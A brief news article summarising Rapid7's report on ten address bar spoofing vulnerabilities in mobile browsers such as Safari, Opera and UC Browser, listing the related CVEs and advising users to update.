Attackers Target Popular Mobile Browsers with Spoofing Attacks
Cybersecurity firm Rapid7 has released a report detailing ten new address bar spoofing vulnerabilities found across seven mobile browser applications. These vulnerabilities stem from a bug in web browsers that allows for a malicious website to modify its real URL and show a fake one instead, with most attackers masquerading their dangerous websites as a legitimate one. Due to the compact nature of mobile web browsers, they tend to lack the more robust security features built into the desktop versions of those same browsers, and because of these lack of security features, these address bar spoofing attacks are much more dangerous on smartphones and other mobile devices.
The impacted browsers mentioned in Rapid7’s report include: Apple Safari, Opera Touch, Opera Mini, Bolt, RITS, UC Browser, and Yandex Browser. When alerted by cybersecurity researchers in August, Apple and Opera both released patches addressing these spoofing issues. The manufacturers of the more niche web browsers, meanwhile, failed to even respond to researchers, likely leaving their browsers vulnerable to these attacks.
Exploiting any of these bugs requires both an outdated browser and an attacker capable of luring users to their malicious sites, likely utilizing social engineering tactics. It’s recommended that users update their browsers immediately or move to browsers that remain unaffected by these bugs. Ten CVEs are related to these vulnerabilities:
- CVE-2020-7363
- CVE-2020-7364
- CVE TBD-Opera
- CVE TBD-Opera
- CVE TBD-Opera
- CVE TBD-Opera
- CVE-2020-7369
- CVE-2020-7370
- CVE-2020-7371
- CVE-2020-9987
Rapid7 explains that an attacker can exploit these vulnerabilities by manipulating the timing between when the page loads and when the browser gets a chance to refresh the address bar URL, a malicious site could force the browser to show the wrong address. A more detailed discussion of the attacker can be found here.
Sources: